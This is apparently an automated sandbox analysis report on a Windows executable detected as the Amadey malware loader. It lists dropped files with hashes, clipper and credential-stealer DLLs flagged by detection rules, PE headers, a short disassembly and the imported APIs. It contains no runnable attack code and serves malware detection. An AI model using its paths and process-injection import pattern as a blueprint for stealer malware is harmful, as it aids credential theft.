                                                              Process:C:\Windows\System32\rundll32.exe
                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1026
                                                              Entropy (8bit):4.701757898321461
                                                              Encrypted:false
                                                              SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                              MD5:520219000D5681B63804A2D138617B27
                                                              SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                              SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                              SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                              Malicious:false
                                                              Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT
                                                              Process:C:\Windows\System32\rundll32.exe
                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1026
                                                              Entropy (8bit):4.701757898321461
                                                              Encrypted:false
                                                              SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                              MD5:520219000D5681B63804A2D138617B27
                                                              SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                              SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                              SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                              Malicious:false
                                                              Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Users\user\Desktop\tOuVwTJrau.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):441344
                                                              Entropy (8bit):6.488128856014368
                                                              Encrypted:false
                                                              SSDEEP:12288:JOKJim5EI9tVEw/JF4+D3q2IMbgiDK7mWasB:Jj9tL8ZMEiDfWb
                                                              MD5:4962575A2378D5C72E7A836EA766E2AD
                                                              SHA1:549964178B12017622D3CBDDA6DBFDEF0904E7E2
                                                              SHA-256:EFF5FAD47B9C739B09E760813B2BCBB0788EB35598F72E64FF95C794E72E6676
                                                              SHA-512:911A59F7A6785DD09A57DCD6D977B8ABD5E160BD613786E871A1E92377C9E6F3B85FE3037431754BBDB1212E153776EFCA5FADAC1DE6B2AD474253DA176E8E53
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe, Author: Joe Security
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 66%
                                                              Joe Sandbox View:
                                                              • Filename: yINR7uQlPr.exe, Detection: malicious, Browse
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........BS..,...,...,.../...,...).#.,..(...,../...,..)...,.......,...(...,...-...,...-.j.,.U.%...,.U.....,.U.....,.Rich..,.........PE..L.....Zg..........................................@..........................0............@..................................F...................................E......8...........................8...@...............<............................text...z........................... ..`.rdata...I.......J..................@..@.data....m...`...,...H..............@....rsrc................t..............@..@.reloc...E.......F...v..............@..B........................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Users\user\Desktop\tOuVwTJrau.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:modified
                                                              Size (bytes):26
                                                              Entropy (8bit):3.95006375643621
                                                              Encrypted:false
                                                              SSDEEP:3:ggPYV:rPYV
                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                              Malicious:true
                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                              Process:C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):126976
                                                              Entropy (8bit):6.36076412023942
                                                              Encrypted:false
                                                              SSDEEP:3072:Vdu5ZXB8ZuzQT7SgmME8Yn/YoZ3SNqpidU1epf:WjGymSg7E8Y3Z3AdUwpf
                                                              MD5:C2F3FBBBE6D5F48A71B6B168B1485866
                                                              SHA1:1CD56CFC2DC07880B65BD8A1F5B7147633F5D553
                                                              SHA-256:C7ED512058BC924045144DAA16701DA10F244AC12A5EA2DE901E59DCE6470839
                                                              SHA-512:E211F18C2850987529336E0D20AA894533C1F6A8AE6745E320FD394A9481D3A956C719AC29627AFD783E36E5429C0325B98E60AEE2A830E75323C276C72F845A
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Author: Joe Security
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 47%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........P...................................................................@......@......@.~.....@......Rich............................PE..L.....Zg...........!.....D..........bp.......`...............................0............@.....................................P.......................................8...............................@............`..L............................text....C.......D.................. ..`.rdata..*u...`...v...H..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................
                                                              Process:C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):1281024
                                                              Entropy (8bit):6.466046469058072
                                                              Encrypted:false
                                                              SSDEEP:24576:BO//kL3TtMhQsnoXyajMK8fCZEqcAxQBuLv8YPKpTG:z3pMhQzRM3MfcAxHv8t
                                                              MD5:C6AABB27450F1A9939A417E86BF53217
                                                              SHA1:B8EF3BB7575139FD6997379415D7119E452B5FC4
                                                              SHA-256:B91A3743C7399AEE454491862E015EF6FC668A25D1AA2816E065A86A03F6BE35
                                                              SHA-512:E5FE205CB0F419E0A320488D6FA4A70E5ED58F25B570B41412EBD4F32BBE504FF75ACB20BFEA22513102630CF653A41E5090051F20AF2ED3AADB53CE16A05944
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Author: Joe Security
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 34%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........D........................s.................................................X..........Rich...........................PE..d.....Zg.........." .........8...............................................P............`..........................................~..X....~....... .......`...............0..l.......p...........................p...8............................................text............................... ..`.rdata..............................@..@.data............D..................@....pdata.......`......................@..@_RDATA...............t..............@..@.rsrc........ .......v..............@..@.reloc..l....0.......x..............@..B........................................................................................................................................................................................
                                                              Process:C:\Users\user\Desktop\tOuVwTJrau.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):284
                                                              Entropy (8bit):3.410526155759918
                                                              Encrypted:false
                                                              SSDEEP:6:tp6bXflNeRKUEZ+lX1VsLlw3btPjgsW2YRZuy0lZtsEt0:tsrf2RKQ1VsLlw3BjzvYRQVZtNt0
                                                              MD5:85FC2008CD4797D3582946DD61EB1C80
                                                              SHA1:F043DF80705C17CDEF871055A96A79BA37B2AB05
                                                              SHA-256:1820C4F84C3B25E18EDCA86809154540815B54DBD3EACAFCB91F47AE02CF3472
                                                              SHA-512:536FCCA4B8F122C8D6078F052BD268BD4273AF6395979A1C41CCF65EEAFEFC741F5F6DFC2873951C981447F216A49060E849B41CD5A9F96748C01C9FB8A7BBE6
                                                              Malicious:false
                                                              Preview:......}...(L..F.H...F.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.e.e.2.9.e.a.5.0.8.b.\.G.x.t.u.u.m...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................
                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Entropy (8bit):6.488128856014368
                                                              TrID:
                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                              • DOS Executable Generic (2002/1) 0.02%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:tOuVwTJrau.exe
                                                              File size:441'344 bytes
                                                              MD5:4962575a2378d5c72e7a836ea766e2ad
                                                              SHA1:549964178b12017622d3cbdda6dbfdef0904e7e2
                                                              SHA256:eff5fad47b9c739b09e760813b2bcbb0788eb35598f72e64ff95c794e72e6676
                                                              SHA512:911a59f7a6785dd09a57dcd6d977b8abd5e160bd613786e871a1e92377c9e6f3b85fe3037431754bbdb1212e153776efca5fadac1de6b2ad474253da176e8e53
                                                              SSDEEP:12288:JOKJim5EI9tVEw/JF4+D3q2IMbgiDK7mWasB:Jj9tL8ZMEiDfWb
                                                              TLSH:5A944B217817D032C62191B11FADFFF195ADA9259B710ADB7BC00E769A201E37A31F39
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........BS..,...,...,.../...,...).#.,...(...,.../...,...)...,.......,...(...,...-...,...-.j.,.U.%...,.U.....,.U.....,.Rich..,........
                                                              Icon Hash:90cececece8e8eb0
                                                              Entrypoint:0x42a6aa
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x675A968B [Thu Dec 12 07:53:47 2024 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:6
                                                              OS Version Minor:0
                                                              File Version Major:6
                                                              File Version Minor:0
                                                              Subsystem Version Major:6
                                                              Subsystem Version Minor:0
                                                              Import Hash:407b29a1346b818a12b66f58555063ce
                                                              Instruction
                                                              call 00007F04B8B31948h
                                                              jmp 00007F04B8B31179h
                                                              mov ecx, dword ptr [ebp-0Ch]
                                                              mov dword ptr fs:[00000000h], ecx
                                                              pop ecx
                                                              pop edi
                                                              pop edi
                                                              pop esi
                                                              pop ebx
                                                              mov esp, ebp
                                                              pop ebp
                                                              push ecx
                                                              ret
                                                              mov ecx, dword ptr [ebp-10h]
                                                              xor ecx, ebp
                                                              call 00007F04B8B309E3h
                                                              jmp 00007F04B8B312E2h
                                                              push eax
                                                              push dword ptr fs:[00000000h]
                                                              lea eax, dword ptr [esp+0Ch]
                                                              sub esp, dword ptr [esp+0Ch]
                                                              push ebx
                                                              push esi
                                                              push edi
                                                              mov dword ptr [eax], ebp
                                                              mov ebp, eax
                                                              mov eax, dword ptr [00466124h]
                                                              xor eax, ebp
                                                              push eax
                                                              push dword ptr [ebp-04h]
                                                              mov dword ptr [ebp-04h], FFFFFFFFh
                                                              lea eax, dword ptr [ebp-0Ch]
                                                              mov dword ptr fs:[00000000h], eax
                                                              ret
                                                              push eax
                                                              push dword ptr fs:[00000000h]
                                                              lea eax, dword ptr [esp+0Ch]
                                                              sub esp, dword ptr [esp+0Ch]
                                                              push ebx
                                                              push esi
                                                              push edi
                                                              mov dword ptr [eax], ebp
                                                              mov ebp, eax
                                                              mov eax, dword ptr [00466124h]
                                                              xor eax, ebp
                                                              push eax
                                                              mov dword ptr [ebp-10h], eax
                                                              push dword ptr [ebp-04h]
                                                              mov dword ptr [ebp-04h], FFFFFFFFh
                                                              lea eax, dword ptr [ebp-0Ch]
                                                              mov dword ptr fs:[00000000h], eax
                                                              ret
                                                              push eax
                                                              push dword ptr fs:[00000000h]
                                                              lea eax, dword ptr [esp+0Ch]
                                                              sub esp, dword ptr [esp+0Ch]
                                                              push ebx
                                                              push esi
                                                              push edi
                                                              mov dword ptr [eax], ebp
                                                              mov ebp, eax
                                                              mov eax, dword ptr [00466124h]
                                                              xor eax, ebp
                                                              push eax
                                                              mov dword ptr [ebp-10h], esp
                                                              push dword ptr [ebp-04h]
                                                              mov dword ptr [ebp-04h], FFFFFFFFh
                                                              lea eax, dword ptr [ebp-0Ch]
                                                              mov dword ptr fs:[00000000h], eax
                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x646000xc8.rdata
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x6d0000x1e0.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x6e0000x45d4.reloc
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x5e1fc0x38.rdata
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x5e3000x18.rdata
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x5e2380x40.rdata
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x510000x33c.rdata
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x10000x4f87a0x4fa002993e117d95f1d03afa8a3d8f5d9b20bFalse0.47672807103610676data6.519213687781525IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .rdata0x510000x149100x14a00a6230b79aa05b6ddd30d009bc284dd22False0.4825284090909091data5.334261055841523IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .data0x660000x6ddc0x2c00d736e1b85746c6f27cfa8213be7d68d3False0.14923650568181818data3.309410946999413IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .rsrc0x6d0000x1e00x2004a05bbd64487346fb2d65a9ea12c5f5eFalse0.53125data4.7176788329467545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .reloc0x6e0000x45d40x46004c333b90caefc486b7b1e29932b836acFalse0.7053013392857143data6.635421796732803IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              RT_MANIFEST0x6d0600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                              DLLImport
                                                              KERNEL32.dllGetFileAttributesA, Process32NextW, CreateFileA, Process32FirstW, CloseHandle, GetSystemInfo, CreateThread, GetThreadContext, GetProcAddress, GetLastError, RemoveDirectoryA, ReadProcessMemory, CreateProcessA, CreateDirectoryA, SetThreadContext, SetEndOfFile, HeapSize, GetProcessHeap, SetEnvironmentVariableW, Wow64RevertWow64FsRedirection, GetTempPathA, Sleep, CreateToolhelp32Snapshot, OpenProcess, SetCurrentDirectoryA, GetModuleHandleA, ResumeThread, GetComputerNameExW, GetVersionExW, WaitForSingleObject, CreateMutexA, FindClose, PeekNamedPipe, CreatePipe, FindNextFileA, VirtualAlloc, Wow64DisableWow64FsRedirection, WriteFile, VirtualFree, FindFirstFileA, SetHandleInformation, WriteProcessMemory, GetModuleFileNameA, VirtualAllocEx, ReadFile, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, GetTimeZoneInformation, HeapReAlloc, ReadConsoleW, SetStdHandle, GetFullPathNameW, GetCurrentDirectoryW, DeleteFileW, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, LCMapStringW, CompareStringW, HeapAlloc, HeapFree, GetConsoleMode, GetConsoleOutputCP, FlushFileBuffers, SetFilePointerEx, GetFileSizeEx, GetCommandLineW, GetCommandLineA, GetStdHandle, GetModuleFileNameW, FileTimeToSystemTime, SystemTimeToTzSpecificLocalTime, GetFileType, GetFileInformationByHandle, GetDriveTypeW, CreateFileW, RaiseException, GetCurrentThreadId, IsProcessorFeaturePresent, FreeLibraryWhenCallbackReturns, CreateThreadpoolWork, SubmitThreadpoolWork, CloseThreadpoolWork, GetModuleHandleExW, InitializeConditionVariable, WakeConditionVariable, WakeAllConditionVariable, SleepConditionVariableCS, SleepConditionVariableSRW, InitOnceComplete, InitOnceBeginInitialize, InitializeSRWLock, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, TryEnterCriticalSection, DeleteCriticalSection, WaitForSingleObjectEx, QueryPerformanceCounter, GetSystemTimeAsFileTime, GetModuleHandleW, EncodePointer, DecodePointer, MultiByteToWideChar, WideCharToMultiByte, LCMapStringEx, GetStringTypeW, GetCPInfo, InitializeCriticalSectionAndSpinCount, SetEvent, ResetEvent, CreateEventW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsDebuggerPresent, GetStartupInfoW, GetCurrentProcessId, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, WriteConsoleW
                                                              USER32.dllGetSystemMetrics, ReleaseDC, GetDC
                                                              GDI32.dllCreateCompatibleBitmap, SelectObject, CreateCompatibleDC, DeleteObject, BitBlt
                                                              ADVAPI32.dllRevertToSelf, RegCloseKey, RegQueryInfoKeyW, RegGetValueA, RegQueryValueExA, GetSidSubAuthorityCount, GetSidSubAuthority, GetUserNameA, CreateProcessWithTokenW, LookupAccountNameA, ImpersonateLoggedOnUser, RegSetValueExA, OpenProcessToken, RegOpenKeyExA, RegEnumValueA, DuplicateTokenEx, GetSidIdentifierAuthority
                                                              SHELL32.dllSHGetFolderPathA, ShellExecuteA, SHFileOperationA
                                                              ole32.dllCoUninitialize, CoCreateInstance, CoInitialize
                                                              WININET.dllHttpOpenRequestA, InternetWriteFile, InternetOpenUrlA, InternetOpenW, HttpEndRequestW, HttpAddRequestHeadersA, HttpSendRequestExA, InternetOpenA, InternetCloseHandle, HttpSendRequestA, InternetConnectA, InternetReadFile
